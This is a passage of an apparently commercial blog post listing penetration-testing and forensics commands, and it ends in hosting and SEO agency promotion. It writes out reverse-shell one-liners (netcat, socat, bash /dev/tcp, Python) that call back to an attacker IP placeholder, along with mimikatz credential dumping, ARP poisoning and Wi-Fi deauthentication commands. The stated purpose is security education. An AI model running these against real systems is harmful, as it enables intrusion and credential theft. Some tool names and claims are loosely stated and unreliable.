Alternatives to medusa: ncrack alternatively provides a more optimized approach for network authentication brute-force attacks, with specific tuning for services like SSH, RDP, and FTP, making it a better choice for large-scale penetration tests. hydra remains a strong alternative, particularly for testing web-based login forms and multi-threaded brute-force attacks against authentication portals.

ettercap

  • Description: ettercap is a man-in-the-middle attack tool, used to intercept and manipulate network traffic. During a penetration test, it's used to demonstrate the impact of man-in-the-middle attacks, revealing potential weaknesses in network security. For network security, ettercap can be used to validate network security controls, aiding in securing networks.
  • Examples:
    • ettercap -G: Launches the Ettercap GUI, providing access to various man-in-the-middle attacks, such as ARP poisoning.
    • ettercap -T -q -i eth0 -M arp /192.168.1.1/ /192.168.1.100/: Performs an ARP poisoning attack, intercepting traffic between the specified hosts.

Alternatives to ettercap: bettercap alternatively offers a more modern and feature-rich framework for man-in-the-middle (MITM) attacks, including Wi-Fi hacking, Bluetooth sniffing, and packet manipulation, making it a superior replacement for ettercap. mitmproxy is another option that provides an interactive HTTP/HTTPS proxy for capturing and modifying web traffic, making it useful for web security assessments.

responder

  • Description: responder is an LLMNR, NBT-NS, and MDNS poisoning attack tool, used to capture network credentials. During a penetration test, it's used to capture credentials, revealing potential weaknesses in network authentication. For network security, responder can be used to identify and mitigate LLMNR, NBT-NS, and MDNS poisoning attacks, aiding in securing networks.
  • Examples:
    • responder -I eth0: Starts Responder on the "eth0" interface, capturing network credentials, such as NTLMv2 hashes.
    • responder -I eth0 -wrf: Starts responder and writes captured hashes to files, allowing for offline cracking.

Alternatives to responder: inveigh alternatively provides a similar network credential harvesting tool but is specifically designed for Windows environments, making it a better option for pentesting Active Directory networks. ntlmrelayx (part of Impacket) is another option that enhances SMB and NTLM relay attacks, allowing for more advanced credential theft and exploitation in enterprise networks.

mimikatz

  • Description: mimikatz is a Windows credential dumping tool, used to extract passwords, hashes, and Kerberos tickets from memory. During a penetration test, it's used to capture credentials, revealing potential weaknesses in Windows security. For network security, mimikatz highlights the dangers of credential dumping, emphasizing the need for proper Windows security configurations.
  • Examples:
    • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit: Extracts logon passwords from memory, revealing plaintext credentials.
    • mimikatz.exe "sekurlsa::tickets /export": Exports Kerberos tickets, allowing for pass-the-ticket attacks.

Alternatives to mimikatz: LaZagne alternatively provides a focused approach to credential extraction, specializing in recovering stored passwords from various applications on Windows and Linux systems, making it a lightweight and efficient alternative. Impacket's secretsdump.py is another option that allows for remote credential dumping without needing code execution on the target machine, making it a stealthier choice for extracting NTLM hashes and other credentials.

powershell -exec bypass

  • Description: powershell -exec bypass is used to execute PowerShell scripts while bypassing execution policy restrictions, allowing for unrestricted script execution. During a penetration test, it's used to execute malicious PowerShell scripts, revealing potential weaknesses in Windows security. For network security, this command highlights the dangers of unrestricted PowerShell execution, emphasizing the need for proper execution policy configurations.
  • Examples:
    • powershell -exec bypass -f malicious.ps1: Executes the "malicious.ps1" script, bypassing execution policy restrictions.
    • powershell -exec bypass -c "Get-Process": Executes the "Get-Process" command, bypassing execution policy restrictions.

Alternatives to powershell -exec bypass: nishang alternatively provides a collection of PowerShell scripts specifically designed for offensive security and post-exploitation, making it a more versatile choice for penetration testers. powercat is another option that functions as a PowerShell implementation of Netcat, allowing for tunneling and reverse shells with native PowerShell execution.

Shells & Reverse Engineering

nc reverse shell

  • Description: nc (Netcat) reverse shell is a technique used to establish a reverse shell connection to a listening attacker. During a penetration test, it's used to gain remote access to compromised systems, revealing potential weaknesses. For network security, understanding how reverse shells work is crucial for detecting and preventing them, aiding in incident response.
  • Examples:
    • nc -lvp 4444: (Attacker) Sets up a listener on port 4444.
    • nc <attacker_ip> 4444 -e /bin/bash: (Target) Connects back to the attacker's listener, providing a reverse shell.

Alternatives to nc reverse shell: socat alternatively provides encrypted and more flexible networking capabilities, allowing for secure and reliable reverse shells, making it a stronger choice than netcat. chisel is another option that supports tunneling over HTTP, providing better firewall evasion techniques than traditional netcat reverse shells.

nc chat server

  • Description: nc (Netcat) chat server is a simple chat server setup using Netcat, allowing multiple clients to connect and communicate. During a penetration test, it can be used for basic communication between team members on a compromised network, revealing potential uses for simple networking tools. For network security, it demonstrates the versatility of Netcat and the need to monitor unusual network traffic.
  • Examples:
  • nc -lvp 4444: (Server) Sets up a listener on port 4444.
    • nc <server_ip> 4444: (Client) Connects to the server.

Alternatives to nc chat server: weechat alternatively provides a more secure and feature-rich command-line chat client, supporting encrypted messaging and multi-user channels, making it a stronger alternative to using netcat for basic communication. irssi is another option that is widely used for IRC-based chat and can be configured for more persistent and secure team communications.

tshark

  • Description: tshark is a command-line packet capturing tool, similar to tcpdump, used for network analysis. During a penetration test, it's used to capture and analyze network traffic, revealing potential vulnerabilities or communication patterns. For network security, tshark is used for network monitoring and troubleshooting, aiding in incident response.
  • Examples:
    • tshark -i eth0: Captures traffic on the "eth0" interface, displaying it in the console.
    • tshark -r capture.pcap -T fields -e ip.src -e ip.dst -e tcp.port: Reads a pcap file and extracts specific fields.

Alternatives to tshark: tcpdump alternatively provides a lightweight command-line packet capture tool that is highly efficient for quick traffic analysis, making it a good alternative when deep packet inspection isn’t required. arkime (formerly Moloch) is another option that enhances packet capture with a powerful web-based interface for large-scale network forensics, making it more suitable for enterprise-level investigations.

timeout

  • Description: timeout is a command-line utility used to limit the execution time of a command. During a penetration test, it's used to prevent long-running commands from hanging or consuming excessive resources, aiding in efficient testing. For network security, timeout can be used to limit the duration of potentially dangerous commands, aiding in system stability.
  • Examples:
    • timeout 5s ping google.com: Runs ping for 5 seconds and then terminates it.
    • timeout 1m ./long_running_script.sh: Runs the script for 1 minute and then terminates it.

Alternatives to timeout: timelimit alternatively provides a more feature-rich approach to limiting the execution time of a process, allowing for finer control over termination and resource management compared to timeout. systemd-run is another option that can launch commands with runtime restrictions and logging, making it more useful in environments with systemd-based process management.

tmux

  • Description: tmux is a terminal multiplexer, allowing for persistent terminal sessions and window management. During a penetration test, it's used to maintain persistent sessions, even if the connection is lost, aiding in long-running tasks. For network security, tmux can be used to manage multiple terminal sessions on a remote server, aiding in system administration.
  • Examples:
    • tmux: Starts a new tmux session.
    • tmux attach: Attaches to an existing tmux session.

Alternatives to tmux: screen alternatively offers a similar terminal multiplexer with robust session persistence, making it a viable alternative for maintaining long-running processes over SSH. byobu is another option that builds on tmux and screen, providing an easier-to-use interface with additional status monitoring features.

ssh

  • Description: ssh (Secure Shell) is a protocol used for secure remote access to systems. During a penetration test, it's used to gain remote access to compromised systems, revealing potential weaknesses in authentication. For network security, ssh is used for secure remote administration, aiding in system management.
  • Examples:
    • ssh user@example.com: Connects to the remote server "example.com" as the user "user."
    • ssh -i private_key user@example.com: Connects using a private key for authentication.

Alternatives to ssh: mosh alternatively provides a more reliable and responsive remote shell connection, particularly over high-latency or unstable networks, making it a better alternative for remote access. teleshell is another option that supports encrypted, peer-to-peer remote connections with built-in session recording, enhancing security and auditability

socat

  • Description: socat is an advanced networking tool, similar to Netcat, used for various networking tasks. During a penetration test, it's used for port forwarding, reverse shells, and other networking tasks, revealing potential weaknesses. For network security, socat can be used for network analysis and troubleshooting, aiding in incident response.
  • Examples:
    • socat tcp-listen:4444,fork exec:/bin/bash: Sets up a listener on port 4444, providing a shell.
    • socat tcp:<attacker_ip>:4444 exec:/bin/bash: Connects to the attacker's listener, providing a reverse shell.

Alternatives to socat: proxytunnel alternatively provides a more secure way to tunnel traffic through HTTP and HTTPS proxies, making it a stronger choice for bypassing restrictive firewalls. chisel is another option that supports encrypted TCP/UDP tunneling over HTTP, allowing for stealthier and more flexible network pivoting.

meterpreter

  • Description: meterpreter is an advanced payload within the Metasploit Framework, providing interactive shell access and post-exploitation capabilities. During a penetration test, it's used to gain control of compromised systems, revealing potential weaknesses. For network security, meterpreter highlights the dangers of advanced payloads, emphasizing the need for proper security controls.
  • Examples:
    • use exploit/multi/handler: Selects a multi-handler exploit within Metasploit.
    • set payload windows/meterpreter/reverse_tcp: Sets the payload to meterpreter.

Alternatives to meterpreter: empire alternatively offers a post-exploitation framework with full scripting capabilities, making it a more advanced alternative for controlling compromised systems. cobalt strike is another option that provides a fully featured command-and-control (C2) framework, widely used in red team engagements for stealthy post-exploitation.

reverse shell (bash, Python, PHP, Perl, PowerShell)

  • Description: Reverse shells are techniques used to establish a reverse shell connection to a listening attacker, using various programming languages. During a penetration test, they're used to gain remote access to compromised systems, revealing potential weaknesses. For network security, understanding how reverse shells work is crucial for detecting and preventing them, aiding in incident response.
  • Examples:
    • bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1: Bash reverse shell.
    • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);': Python reverse shell.

Alternatives to reverse shell (bash, Python, PHP, Perl, PowerShell): sliver alternatively provides a modern, cross-platform command-and-control framework that enhances reverse shell functionality with encryption and automation, making it a better choice than traditional one-liner reverse shells. evil-winrm is another option that specializes in Windows Remote Management (WinRM) exploitation, allowing for stealthier and more effective command execution on Windows targets.

chisel

  • Description: chisel is a TCP tunneling tool over HTTP, used to bypass firewalls and establish secure tunnels. During a penetration test, it's used to gain access to internal networks, revealing potential weaknesses. For network security, chisel highlights the dangers of tunneling, emphasizing the need for proper firewall configurations.
  • Examples:
    • chisel server --port 8080 --reverse: (Server) Sets up a chisel server on port 8080.
    • chisel client <server_ip>:8080 R:127.0.0.1:22:127.0.0.1:22: (Client) Creates a tunnel to forward port 22.

Alternatives to chisel: ligolo-ng alternatively provides a more stealthy and flexible tunneling solution that supports automatic SOCKS5 proxying, making it a better alternative for bypassing firewalls and pivoting inside networks. iodine is another option that enables tunneling data over DNS requests, making it highly effective in environments where other outbound traffic is restricted.

Wireless Hacking

airmon-ng

  • Description: airmon-ng is a tool used to enable monitor mode on wireless network cards, allowing for packet capture. During a wireless penetration test, it's used to put the wireless card into a mode where it can capture all Wi-Fi traffic, regardless of network association, revealing potential weaknesses in wireless security. For network security, understanding how monitor mode works is crucial for analyzing wireless traffic and detecting anomalies.
  • Examples:
    • airmon-ng start wlan0: Enables monitor mode on the "wlan0" interface, creating a new interface (e.g., wlan0mon).
    • airmon-ng stop wlan0mon: Disables monitor mode on the "wlan0mon" interface, returning the card to managed mode.

Alternatives to airmon-ng: hcxdumptool alternatively provides a more modern approach to Wi-Fi packet capture and attack automation, making it a better alternative for WPA handshake collection and PMKID attacks. bettercap is another option that offers advanced Wi-Fi attack capabilities, including real-time packet manipulation and wireless network monitoring.

airodump-ng

  • Description: airodump-ng is a tool used to capture Wi-Fi packets, displaying information about nearby wireless networks and connected clients. During a wireless penetration test, it's used to gather information about target networks, such as ESSID, BSSID, and channel, revealing potential targets. For network security, airodump-ng is used for wireless network monitoring and analysis, aiding in detecting unauthorized access points.
  • Examples:
    • airodump-ng wlan0mon: Captures Wi-Fi packets on the "wlan0mon" interface, displaying information about nearby networks.
    • airodump-ng -c 6 --bssid <target_bssid> -w capture wlan0mon: Captures packets on channel 6 for the specified BSSID, writing the capture to a file named "capture."

Alternatives to airodump-ng: kismet alternatively provides a more feature-rich and scalable solution for Wi-Fi network monitoring, including passive device detection and automated logging, making it a better choice for security professionals. horst is another option that offers real-time visualization of wireless network activity, making it easier to analyze traffic and detect anomalies.

aireplay-ng

  • Description: aireplay-ng is a tool used to deauthenticate clients from Wi-Fi networks and inject packets, allowing for various attacks. During a wireless penetration test, it's used to force clients to reconnect, capturing WPA/WPA2 handshakes, or to inject packets for various attacks, revealing potential weaknesses. For network security, understanding how deauthentication and packet injection work is crucial for detecting and preventing wireless attacks.
  • Examples:
    • aireplay-ng -0 1 -a <target_bssid> -c <client_mac> wlan0mon: Deauthenticates the specified client from the target network.
    • aireplay-ng -3 -b <target_bssid> wlan0mon: Performs an ARP request replay attack, injecting packets.

Alternatives to aireplay-ng: wifite alternatively automates the process of Wi-Fi deauthentication and attack execution, making it a better alternative for quickly testing network vulnerabilities. mdk4 is another option that supports more aggressive Wi-Fi attack techniques, including beacon flooding and authentication denial-of-service attacks.

aircrack-ng

  • Description: aircrack-ng is a tool used to crack WEP and WPA/WPA2 Wi-Fi passwords using captured packets. During a wireless penetration test, it's used to crack passwords, revealing potential weaknesses in wireless security. For network security, aircrack-ng highlights the dangers of weak Wi-Fi passwords, emphasizing the need for strong passwords and robust security protocols.
  • Examples:
    • aircrack-ng capture-01.cap: Attempts to crack the password from the captured packets in "capture-01.cap."
    • aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap: Attempts to crack the password using the specified wordlist.

Alternatives to aircrack-ng: hashcat alternatively provides significantly faster WPA/WPA2 cracking capabilities using GPU acceleration, making it the preferred choice over aircrack-ng for password recovery. wifite is another option that simplifies the entire process of Wi-Fi network cracking by automating handshake capture and attack execution.

wifite

  • Description: wifite is an automated Wi-Fi hacking tool that automates the process of capturing handshakes and cracking passwords. During a wireless penetration test, it's used to quickly test the security of multiple Wi-Fi networks, revealing potential weaknesses. For network security, wifite highlights the dangers of automated attacks, emphasizing the need for robust wireless security.
  • Examples:
    • wifite: Launches the Wifite tool, automating the process of capturing handshakes and cracking passwords.
    • wifite -wps: Only targets WPS enabled networks.

Alternatives to wifite: airgeddon alternatively provides an easy-to-use interface for Wi-Fi security testing and attack execution, making it a better choice for beginners and advanced users alike. fluxion is another option that focuses on capturing Wi-Fi credentials through evil twin attacks, making it more effective for social engineering-based network penetration.

kismet

  • Description: kismet is a wireless network detector and sniffer, used to identify wireless networks and capture packets. During a wireless penetration test, it's used to discover hidden or rogue wireless networks, revealing potential targets. For network security, kismet is used for wireless network monitoring and intrusion detection, aiding in securing wireless environments.
  • Examples:
    • kismet: Launches the Kismet tool, starting wireless network detection and packet capture.
    • kismet -c wlan0mon: Starts Kismet on the wlan0mon interface.

Alternatives to kismet: wardriving alternatively offers a dedicated solution for large-scale wireless network mapping, making it a better option for identifying and analyzing Wi-Fi networks across wide geographic areas. netsniff-ng is another option that provides advanced wireless sniffing capabilities, supporting high-speed packet capture and forensic analysis.

Forensics & Miscellaneous

strings

  • Description: strings is a command-line utility used to extract readable text from binary files. During a forensic investigation, it's used to find hidden text, such as passwords, URLs, or other sensitive information, revealing potential clues. For malware analysis, strings can identify embedded strings that indicate malicious behavior.
  • Examples:
    • strings binary_file: Extracts readable text from the "binary_file," displaying it in the console.
    • strings binary_file | grep "password": Extracts readable text and filters for lines containing "password," finding potential credentials.

Alternatives to strings: binwalk alternatively provides a more powerful tool for extracting embedded data and reverse engineering firmware, making it a better alternative for analyzing binary files. rizin is another option that enhances binary analysis with interactive debugging and advanced disassembly features, making it more suitable for reverse engineering malware and software.

foremost

  • Description: foremost is a file carving tool used for data recovery, extracting files from disk images or other data sources. During a forensic investigation, it's used to recover deleted files or extract embedded files, revealing potential evidence. For data recovery, foremost can be used to recover lost files from corrupted storage devices.
  • Examples:
    • foremost -i disk_image.dd: Extracts files from the "disk_image.dd" disk image, recovering deleted or embedded files.
    • foremost -t jpg,png -i disk_image.dd: Extracts only JPG and PNG files from the disk image, focusing on specific file types.

Alternatives to foremost: scalpel alternatively provides a faster and more efficient file carving tool that supports multi-threading and advanced filtering options, making it a better alternative for recovering deleted files. photorec is another option that specializes in recovering lost photos and media files, making it a preferred choice for digital forensics.

autopsy

  • Description: autopsy is a digital forensics platform used for analyzing disk images and other data sources, providing a graphical interface for forensic investigations. During a forensic investigation, it's used to analyze evidence, recover files, and generate reports, revealing potential clues. For incident response, autopsy can be used to analyze systems and identify malicious activity.
  • Examples:
    • autopsy: Launches the Autopsy tool, providing a graphical interface for forensic analysis.
    • Creating a new case in Autopsy and adding a disk image: This allows for analysis of a disk image.

Alternatives to autopsy: velociraptor alternatively provides a more scalable and real-time forensic analysis framework that supports remote endpoint investigation, making it a better alternative for incident response. sleuthkit is another option that offers a robust suite of forensic tools, making it a stronger choice for low-level disk analysis and evidence recovery.

volatility

volatility -f memory_dump.raw --profile=Win7SP1x64 pslist: Lists the running processes in the memory dump.

Description: volatility is a memory forensics framework used to analyze memory dumps, providing insights into system state and activity. During a forensic investigation, it's used to extract information from memory dumps, such as running processes, network connections, and loaded modules, revealing potential evidence. For incident response, volatility can be used to analyze memory and identify malicious activity.

Examples:

volatility -f memory_dump.raw imageinfo: Identifies the operating system and profile of the memory dump.

Alternatives to volatility: rekall alternatively provides a more modern and scalable memory forensics framework, supporting a wider range of operating systems and forensic techniques, making it a better alternative for analyzing memory dumps. magnet ram capture is another option that allows for quick and stealthy memory acquisition, making it useful in incident response scenarios where preserving volatile data is critical.

#

Mastering these top 60 hacking command-line commands can significantly enhance your cybersecurity skills, whether you're testing system vulnerabilities, automating tasks, or securing your own network. However, having the right hosting and security setup is just as important.

At Norzer, we offer managed WordPress hosting with top-tier security, performance optimization, and expert support—so you can focus on what you do best. Whether you're running a personal blog or a business site, we handle the technical side, so you don’t have to. Get started today and experience hassle-free WordPress hosting! 🚀

RECENT POSTS

GMBspy Chrome extension video tutorial - Google My Business
Video: How to find out what Google My Business (GMB) categories your competition is using using GMBspy.
In this video tutorial, I show you how to use a really cool (and free) Chrome extension called GMBspy (GMB Spy) to find out all of the Google My Business (GMB) business categories a business is using. This is important because Google only shows your the primary category chosen. It's critical that you understand what […]
READ MORE
Thruuu SEO Google SERP Scraper Tool Video Tutorial
Video Tutorial: Scrape Google Search Results (SERP) using a free SEO tool called Thruuu! It’s Similar to Surfer SEO.
In this video tutorial, I show you how to use Thruuu. Thruuu is an awesome tool I just came across today. It does a lot of what Surfer SEO does without the price tag. It could be a good free alternative option to Surfer SEO for you. Thruuu website: https://app.samuelschmitt.com/​ Creator Twitter profile: https://twitter.com/samuelschmitt   […]
READ MORE
Google NLP API SEO Content Optimization
Video Tutorial: How to use the Google NLP API to build SEO-optimized content/copy. AI/MI SEO Basics!
In this video, I will show you how to use the Google Natural Language Processing (NLP) API to help you build and SEO-optimize your content and copy. This video will provide you with a very basic understanding of how machine learning (artificial intelligence) analyzes and interprets content. These are the resources mentioned in the video […]
READ MORE

WHY NORZER?


We’re not a giant agency chasing big brands—we’re a small business built by an old-school hacker and animal lover who still believes business should be personal. At Norzer, we combine cutting-edge SEO and AI LLMO tools with hands-on, relationship-driven service. We take the time to understand your niche, your competition, and what truly drives results in your local market.


Based in Louisiana and proudly crypto-friendly, we deliver expert Local SEO, WordPress design, secure hosting, and blazing-fast performance built to generate real leads. With one client per city and a private chat room for direct access to our team, you get unmatched support and a long-term partner invested in your growth. We genuinely value our partners and send surprise gifts every month. It's just our way of saying thanks. Learn more about Norzer!

TESTIMONIALS

"I consider Norzer my biggest advantage in technology. Ryan and his team bring a level of expertise and dedication that is hard to find. Norzer has exponentially helped grow my (SantaYearRound.com) Santa for Hire business from nothing to getting a lead per day + and this, the Christmas season, I’m unable to fulfill all of the requests . Ryan knows his local SEO . At this rate, Norzer is gonna create a monster I’ll hafta hire help ."

Santa Mac

Professional Santa

"Working with Norzer has been an absolute game-changer for our small business. Their team didn’t just throw out generic advice—they took the time to understand our goals and crafted a strategy that actually works. Since launching with them, our local visibility has skyrocketed, and leads are finally coming in steady. Thank you, Norzer — you seriously nailed it! THANK YOU! THANK YOU!" THANK YOU!"

Dan Thimel

IT Manger

"We were spending too much on ads and getting poor-quality referrals. Then we found Norzer. Their local SEO strategy completely changed things. Within weeks, we started ranking for the right searches, and real, qualified leads began coming in steadily. It’s been a major boost for our firm. If you're a law office looking to generate consistent local leads without wasting your budget, Norzer is the partner you need to get that ball rolling."

Wiiliam Gust

Marketing Manager

WORK WITH NORZER

There are many digital marketing agencies out there offering professional digital marketing and website services. None are quite like Norzer. We make the process simple and risk-free, even for small businesses that don’t even know where to begin. Here’s how the process works:

Step 1Schedule a free consultation.

Step 2: We will discuss your current business goals and present a plan of how Norzer can help you increase leads.

Step 3: Norzer goes to work developing and implementing a strategy that will produce results that align with your business goals.

The best part: you don’t owe us a dime until for our initial analysis. You are free to take our analysis and do your own work if you choose. You work tirelessly to ensure the best possible experience for every customer that steps foot in your door or visits your website. We do the same. Help us help you!